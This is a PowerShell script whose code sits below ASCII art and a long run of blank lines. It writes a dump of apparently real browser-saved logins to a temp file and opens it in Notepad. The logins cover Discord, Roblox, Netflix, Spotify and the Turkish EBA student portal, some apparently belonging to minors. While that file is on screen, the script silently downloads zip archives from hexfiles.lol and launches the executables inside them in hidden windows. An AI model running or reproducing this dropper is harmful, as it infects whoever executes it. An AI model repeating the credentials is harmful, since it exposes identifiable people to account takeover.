#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέμιέμνέμνέμνέκνέλνέμνέμνέμνέμνέμνέμΕέμΑέμΑέκΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέμιέμ┐έκ┐έμθέιψέκΤέλψέμ╜έμΥέμΤέλ╛έμψέμφέμ┐έμ┐έι┐έιφέιφέμψέμ╖έμοέκΑέιΑέιΑέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέμ░έμ┐έμψέμηέμΧέμ╜έι╛έι┐έι┐έι┐έλ┐έμΠέμ┐έμ┐έμ┐έκΩέμ╜έμ┐έμ┐έμ╖έκζέμ┐έμ┐έκΗέιΑέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέμΑέμδέιδέλ┐έμδέλζέλΒέμΑέμΑέμΑέιΥέι╢έιΙέμ┐έμ┐έκ┐έιΩέιΚέιΒέλΑέμΑέμ╣έμδέμδέμ│έλΕέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέκΦέκ╛έλΒέμ┤έκΗέλοέμυέμβέμδέμΜέμνέμ┐έμ┐έμ╖έμ╛έμ┐έμ┐έμ┐έκΗέλ┐έμ┐έκθέι╗έιδέκΚέμΞέμ▓έλ▒έιΒ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέμΘέμΘέλ╕έμΚέκΑέλοέμΝέκβέι╗έι┐έμψέμφέμξέικέκνέι┐έλ┐έμ┐έμ┐έκΗέιΚέκ╗έλ┐έμ┐έιΘέλ╗έμθέι╝έιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΙέιςέμ┤έμ┐έμπέκΑέλΚέιδέιαέλ╢έμοέμυέιΚέμΑέιΥέι┐έι┐έιψέλΚέμ┤έι┐έι┐έιΥέκΒέκΕέιΑέμ┐έιΔέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιβέμ┐έμ┐έμ╖έμΝέι╗έλιέμνέμΑέιΚέιΡέιδέι┐έι┐έι░έι╢έιοέι░έι╢έιΘέιαέιΔέιΒέιΑέμ┐έιΑέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιαέλ┐έμ┐έμ┐έμ╖έμΝέι╗έλ┐έιΘέμ╝έμ╢έμοέκΕέμΕέμΑέκΑέλΑέκΑέλΑέκΑέκΑέιΑέλιέμ┐έιΑέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιβέιψέμδέιφέμ╗έι╢έμυέμΚέμδέιδέιΔέι┐έι┐έιΔέι┐έιΔέιγέμΑέμΒέμνέμ╛έμ┐έκΑέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιβέιΤέιψέμ╢έμΜέκ╜έλδέμ┐έμψέμ┐έμφέμφέκ┐έλ┐έμ┐έμ╗έμ╛έλθέμ┐έκΘέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΚέιδέι┐έι┐έμ╢έμ╛έμ┐έμ┐έμ┐έμφέμφέμφέμ╢έμ┐έκ┐έιΒέιΑ
#έιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΑέιΚέιβέιδέιδέιδέιδέιΜέιΒέιΑέιΑέιΑ























































































$f="$env:TEMP\a.txt";[System.IO.File]::WriteAllText($f,@'
=== chrome_default ===
URL: https://webshop.civaner.com/Giris
Username: ucuzlermakina20@gmail.com
Password: 567649
======================

=== chrome_default ===
URL: https://aternos.org/signup/
Username: ZeusBoxPvpwin
Password: 02052012
======================

=== chrome_default ===
URL: https://discord.com/login
Username: eak91191@gmail.com
Password: 02052012ma
======================

=== chrome_default ===
URL: https://giris.eba.gov.tr/EBA_GIRIS/student.jsp
Username: 16783884690
Password: 167838
======================

=== chrome_default ===
URL: https://b4b.civaner.com/Giris
Username: ucuzlermakina20@gmail.com
Password: 567649
======================

=== chrome_default ===
URL: https://sonoyuncu.com.tr/kaydol
Username: hzsnifer
Password: 02052012na
======================

=== chrome_default ===
URL: https://app.ugurdijital.com/login
Username: nisanur.ak27
Password: P5TRW6uzVW
======================

=== chrome_default ===
URL: https://yeni.ugurdijital.com/login
Username: isra.nur.ak
Password: FEwbtNZKd2
======================

=== chrome_default ===
URL: https://yeni.ugurdijital.com/login
Username: nisanur.ak27
Password: P5TRW6uzVW
======================

=== chrome_default ===
URL: https://app.ugurdijital.com/login
Username: isra.nur.ak
Password: FEwbtNZKd2
======================

=== chrome_default ===
URL: https://tlauncher.org/en/reg/
Username: HzConfin
Password: 02052012nan
======================

=== chrome_default ===
URL: https://www.instagram.com/accounts/login/
Username: the_cofin.1
Password: 040664032
======================

=== chrome_default ===
URL: https://sonoyuncu.com.tr/kaydol
Username: TheCofin
Password: 02052012na
======================

=== chrome_default ===
URL: https://sonoyuncu.com.tr/giris-yap
Username: thecofin
Password: 02052012na
======================

=== chrome_default ===
URL: https://www.craftrise.com.tr/
Username: emk_ak
Password: 02052012Na
======================

=== chrome_default ===
URL: https://aternos.org/signup/
Username: TEL_NETWORK
Password: 02052012na
======================

=== chrome_default ===
URL: https://forum.gamer.com.tr/register/
Username: Cofin
Password: 02052012
======================

=== chrome_default ===
URL: https://www.roblox.com/tr/login
Username: emirhan454545k
Password: 02052012na
======================

=== chrome_default ===
URL: https://web.ugurdijital.com/login
Username: emirhan.ak38
Password: KDfYakMkK2
======================

=== chrome_default ===
URL: https://web.ugurdijital.com/login
Username: nisanur.ak27
Password: xwae2yCDM3
======================

=== chrome_default ===
URL: https://register.playcove.net/
Username: eak91191@gmail.com
Password: 012345
======================

=== chrome_default ===
URL: https://www.spotify.com/pl/signup
Username: sokucuorjinal@gmail.com
Password: 040664032na
======================

=== chrome_default ===
URL: https://windscribe.com/signup
Username: hzsnifer
Password: 040664032
======================

=== chrome_default ===
URL: https://giris.eba.gov.tr/EBA_GIRIS/student.jsp
Username: 16714886922
Password: 167148
======================

=== chrome_default ===
URL: https://cheatglobal.com/register/
Username: olandaw
Password: 040664032
======================

=== chrome_default ===
URL: https://scalacube.com/tr/cp
Username: eak91191@gmail.com
Password: 040664032na
======================

=== chrome_default ===
URL: https://craftlime.net/recover-account/637312/97f767deaf80803e0022cb0d9efd9e02
Username: hzconfin
Password: 040664032na
======================

=== chrome_default ===
URL: https://sso.eba.gov.tr/login
Username: 16783884690
Password: 167838
======================

=== chrome_default ===
URL: https://www.chess.com/register
Username: sokucuorjinal@gmail.com
Password: 02052012Na
======================

=== chrome_default ===
URL: https://panel.freemcserver.net/user/register
Username: Benduck
Password: 040664032nA!
======================

=== chrome_default ===
URL: https://www.planetminecraft.com/account/create/
Username: eak91191@gmail.com
Password: 040664032
======================

=== chrome_default ===
URL: https://builtbybit.com/login/register
Username: benneyhimyqa
Password: 040664032
======================

=== chrome_default ===
URL: https://sso.eba.gov.tr/login
Username: 16432896302
Password: 164328
======================

=== chrome_default ===
URL: https://sso.eba.gov.tr/login
Username: 16714886922
Password: 167148
======================

=== chrome_default ===
URL: https://credentials.minehut.app/
Username: eak91191@gmail.com
Password: 040664032Na.
======================

=== chrome_default ===
URL: https://dashboard.honeygain.com/sign-up
Username: eak91191@gmail.com
Password: 040664032
======================

=== chrome_default ===
URL: https://discord.com/reset
Username: 
Password: 4+n38k:_n[CxW%C
======================

=== chrome_default ===
URL: https://support.discord.com/auth/v3/password/set
Username: 
Password: 040664032nan
======================

=== chrome_default ===
URL: https://support.discord.com/auth/v3/signin
Username: eak91191@gmail.com
Password: 02052012ma
======================

=== chrome_profile_4 ===
URL: https://www.craftrise.com.tr/
Username: sokucuorjinal@gmail.com
Password: 02052012naA
========================

=== chrome_profile_4 ===
URL: https://discord.com/register
Username: sokucuorjinal@gmail.com
Password: 040664032naa
========================

=== chrome_profile_4 ===
URL: https://www.roblox.com/tr
Username: MilassOfical
Password: 02052012na
========================

=== chrome_profile_4 ===
URL: https://www.mcserverhost.com/create-free-server
Username: sokucuorjinalon
Password: 040664032
========================

=== chrome_profile_4 ===
URL: https://cheatglobal.com/lost-password/olandaw.390887/confirm
Username: sokucuorjinal@gmail.com
Password: 040664032
========================

=== chrome_profile_4 ===
URL: https://realitycheats.com/attachments/crl0gs-txt.27642/
Username: sokucuorjina
Password: 040664032
========================

=== chrome_profile_4 ===
URL: https://discord.com/register
Username: emirdavuk@proton.me
Password: 0406644032naw
========================

=== chrome_profile_4 ===
URL: https://account.protonvpn.com/reset-password
Username: sokucuorjinal@gmail.com
Password: 040664032
========================

=== chrome_profile_4 ===
URL: https://www.netflix.com/signup
Username: sokucuorjinal@gmail.com
Password: %5L?t_S!/5.,w4W
========================

=== chrome_profile_4 ===
URL: https://sms-receive.net/register_private.php
Username: sokucuorjinal@gmail.com
Password: 7Pb#h8J!365@4e_
========================

=== chrome_profile_4 ===
URL: https://accounts.spotify.com/tr/password-reset/complete
Username: sokucuorjinal@gmail.com
Password: k^TxvEb4pg$"as7
========================

=== chrome_profile_4 ===
URL: https://gameplus.com.tr/game-kayit
Username: sokucuorjinal@gmail.com
Password: u*x2r8xhD32GB7U
========================

=== chrome_profile_6 ===
URL: https://www.roblox.com/tr
Username: dalin8520
Password: 0123456789
========================

=== chrome_profile_6 ===
URL: https://web.ugurdijital.com/login
Username: isra.nur.ak
Password: rasgT93QJ2
========================

=== chrome_profile_6 ===
URL: https://web.ugurdijital.com/login
Username: nisanur.ak27
Password: xwae2yCDM3
========================

=== edge_default ===
URL: https://www.craftrise.com.tr/kayit
Username: emk_ak
Password: 02052012Na
====================

=== edge_default ===
URL: https://www.roblox.com/login
Username: emirhan454545k
Password: 02052012
====================

=== edge_default ===
URL: https://aternos.org/signup/
Username: BoraLossss
Password: 02052012
====================

=== edge_default ===
URL: https://www.craftrise.com.tr/
Username: skailai
Password: 02052012maM
====================

=== edge_default ===
URL: https://tlauncher.org/en/reg/
Username: Sniperq
Password: 02052012nan
====================

=== edge_default ===
URL: https://webshop.civaner.com/Giris
Username: ucuzlermakina20@gmail.com
Password: 567649
====================

=== edge_default ===
URL: https://aternos.org/signup/
Username: ZeusBoxPvpwin
Password: 02052012
====================

=== edge_default ===
URL: https://discord.com/login
Username: eak91191@gmail.com
Password: 02052012na
====================

=== edge_default ===
URL: https://giris.eba.gov.tr/EBA_GIRIS/student.jsp
Username: 16783884690
Password: 167838
====================

=== edge_default ===
URL: https://b4b.civaner.com/Giris
Username: ucuzlermakina20@gmail.com
Password: 567649
====================

=== edge_default ===
URL: https://krunker.io/
Username: emk
Password: 02052012
====================

=== edge_default ===
URL: https://worlds.frvr.com/
Username: emk
Password: 02052012
====================

=== edge_default ===
URL: https://app.ugurdijital.com/login
Username: nisanur.ak27
Password: P5TRW6uzVW
====================

=== edge_default ===
URL: https://app.ugurdijital.com/login
Username: isra.nur.ak
Password: FEwbtNZKd2
====================

=== edge_default ===
URL: https://yeni.ugurdijital.com/login
Username: isra.nur.ak
Password: FEwbtNZKd2
====================

=== edge_default ===
URL: https://yeni.ugurdijital.com/login
Username: nisanur.ak27
Password: P5TRW6uzVW
====================

=== edge_default ===
URL: https://sonoyuncu.com.tr/kaydol
Username: hzsnifer
Password: 02052012na
====================

=== edge_default ===
URL: https://tlauncher.org/en/reg/
Username: HzConfin
Password: 02052012nan
====================
'@);notepad $f;$u='https://hexfiles.lol/d/cf3238878159','https://hexfiles.lol/d/0205765929d6';$b="$home\.cache";md $b -ErrorAction SilentlyContinue|Out-Null;$u|%{$d="$b\$([guid]::NewGuid())";md $d|Out-Null;Start-Job{$a=$args[0];$d=$args[1];$z="$d.zip";(New-Object Net.WebClient).DownloadFile($a,$z);Expand-Archive $z $d -Force;$e=Get-ChildItem $d -Recurse *.exe|Select-Object -First 1;if($e){Start-Process $e.FullName -WindowStyle Hidden}}-ArgumentList $_,$d}
